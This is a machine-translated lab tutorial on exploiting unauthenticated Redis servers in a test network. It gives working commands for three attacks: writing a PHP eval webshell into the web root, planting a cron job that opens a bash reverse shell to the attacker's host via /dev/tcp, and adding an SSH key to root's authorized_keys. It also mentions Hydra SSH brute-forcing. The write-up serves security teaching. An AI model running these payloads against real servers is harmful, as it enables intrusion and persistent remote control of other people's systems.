Unauthorized access vulnerability

Unauthorized principle ：

An unauthorized access vulnerability can be understood as an address requiring security configuration or permission authentication 、 Improper configuration of the authorization page leads to other users' direct access without authentication authorization, which leads to important permissions that can be operated 、 Disclosure of sensitive information such as database or website directory .

Redis Unauthorized access vulnerability

When redis service (6379) When the port is open to the public without password authentication , Any user can access without authorization redis Service and operate to obtain its data .
In this paper, three methods are used redis Unauthorized access vulnerability ：

1. utilize redis Write webshell;
2. Use write timing task bounce shell;
3. utilize redis Write ssh Public key getshell.

Environmental preparation

This machine kali：10.1.1.100
Target machine ：10.1.1.200

information gathering , Environment building

1. Collect information , Look for possible points
   

 adopt nmap Port scan , The following ports are found open ：

22 port ：ssh Remote login 

80 port ：http Web Services 

6379 port ：redis service 

2. See that the target machine is open 80 port , Try to access with the browser .
   

3. Through directory scanning, sensitive directories of the website are found , There is phpinfo Information disclosure .
   

4. The target machine exists 6379 namely Redis service , Try to test if there is Redis Unauthorized vulnerability ：
   First download Redis Client connection tools （ link ）, Decompress and enter Redis Catalog , And then through make Compile , You can use Redis-cli Try to connect Redis The server ：
   

tar -zxf redis-6.0.3.tar.gz

cd redis-6.0.3

make 

5. After compiling redis-cli Default generated at src Catalog , Get into src Catalog , take redis-cli Copied to the /usr/bin The directory can be executed in any directory of the terminal redis-cli：

cd src/

cp redis-cli /usr/bin

cd ../../

redis-cli -h 10.1.1.200 -p 6379

-h： Specify connected redis The server 

-p： Appoint redis Server port 

info： Print system information , Such as Redis Version of 、 Target system version 、 System architecture, etc 

 As shown in the above figure, it does exist Redis Unauthorized access vulnerability .

Hydra Brute force ssh Sign in

1. Prepare a dictionary .

2. Use hydra Blasting .
   

3. Use the blasted password for remote connection .
   

2.Redis Unauthorized write webshell

1. adopt redis Combination of data backup function WEB service , Go to WEB The root directory of the website writes a sentence, Trojan , To get WEB Website permission .
   Write a sentence into the root directory of the website , There are two prerequisites , First of all ： Know the absolute path of the root directory of the target website , second ： Have write permission to the root directory of the target website , Through the front phpinfo Page information collection , We can know that the absolute path of the root directory of the target website is ：/var/www/html
   

2. Write a sentence to the root directory of the website by executing the following command ：

redis-cli -h 10.1.1.200 -p 6379     # Connect redis The server 

config set dir /var/www/html     	# Set the placement path of database backup files 

config set dbfilename shell.php   	# Set the file name of the backup file 

set x "<?php @eval($_POST['test']);?>"   # Add a key ”x”, The value is one sentence 

save     # preservation 

Be careful ： When setting the key value to one sentence Trojan , You can use the following form ：

set x “\r\n\r\n<?php @eval($_POST['cmd']);?>\r\n\r\n”

explain ：”\r\n\r\n” Means line break , use Redis The written file will bring some version information , If you don't wrap lines, you may not be able to execute .

Visit the corresponding page through the browser to confirm whether the file is written successfully , It is shown as follows , Description successfully written ：

Then you can connect a sentence Trojan horse through ant sword ：

3.Redis Unauthorized write timed task bounced shell

1. Kali Use nc Turn on monitoring ,kali Execute the following commands under the terminal ：

nc -lvvp 4433

2. Execute the following command to write the scheduled task

redis-cli -h 10.1.1.200 -p 6379   # Connection target redis service     

set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.100/4433 0>&1\n\n"  

# Set the content written , Add line breaks before and after the planned task to ensure that the written planned task can be parsed normally , Execute every minute /bin/bash -i >& /dev/tcp/10.1.1.100/4433 0>&1

config set dir /var/spool/cron    # Set backup path 

config set dbfilename root   	# Set the backup file name 

save          # preservation 

3. Wait a minute to get the target shell：
   

4. Redis Unauthorized write SSH Get the public key shell

The attacker is not authorized to access Redis You can use Redis Related methods , If you run Redis Of users are root user , An attacker can successfully write his public key to the /root/.ssh The folder authotrized_keys In file , Then you can log in to the target server directly without a password .

1. Generate public key , By default , Generated in the user's home directory .ssh Under the table of contents ：

ssh-keygen -t rsa

2. Write the public key to foo.txt file , Front and back \n Line break , Avoid and Redis Mix other cached data

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

3. take foo.txt Target writer （ Use redis-cli -h ip Command to connect target , write file ）

cat /tmp/foo.txt | redis-cli -h 10.1.1.200 -p 6379 -x set sshkey

4. Connect Redis

redis-cli -h 10.1.1.200 -p 6379

5. Set the backup file path

config set dir /root/.ssh/

6. Set the name of the backup file to authorized_keys

config set dbfilename "authorized_keys"

save

7. Connect to the target machine remotely

ssh [email protected] -i /root/.ssh/id_rsa